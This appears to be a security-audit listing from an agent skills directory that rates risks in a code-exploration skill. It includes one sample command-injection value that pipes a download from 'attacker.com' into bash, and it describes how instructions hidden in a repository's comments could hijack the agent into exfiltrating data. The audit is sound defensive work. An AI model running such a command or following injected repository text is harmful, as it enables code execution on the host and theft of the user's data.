The Agent Skills Directory

[COMMAND_EXECUTION] (CRITICAL): The skill constructs shell commands by directly interpolating variables {owner}/{repo} and {version} into strings for execution (e.g., ghq get {owner}/{repo}, git checkout {version}, and grep "{owner}/{repo}"). A malicious user or a compromised package registry could provide a string containing shell metacharacters (e.g., repo; curl http://attacker.com/exploit | bash) to achieve arbitrary code execution on the host system.
[PROMPT_INJECTION] (HIGH): The skill is a primary target for Indirect Prompt Injection (Category 8). It is designed to ingest and analyze untrusted content from the internet (OSS source code). Because the skill possesses high-privilege tools like bash and webfetch, a malicious repository containing instructions hidden in comments or documentation could hijack the agent to perform unauthorized actions or exfiltrate data.
[DATA_EXFILTRATION] (MEDIUM): The skill reads local package manifest files and has access to the network via gh api and webfetch. While webfetch usage is supposedly restricted to official domains, the inclusion of the bash tool provides an unrestricted secondary channel for data exfiltration if the agent is subverted by a malicious repository.
[EXTERNAL_DOWNLOADS] (LOW): The skill downloads code from GitHub and queries registries like npm and PyPI. Per [TRUST-SCOPE-RULE], these sources are considered trusted, which downgrades the download finding itself, but does not mitigate the risk of the downloaded content being malicious.

code-explorer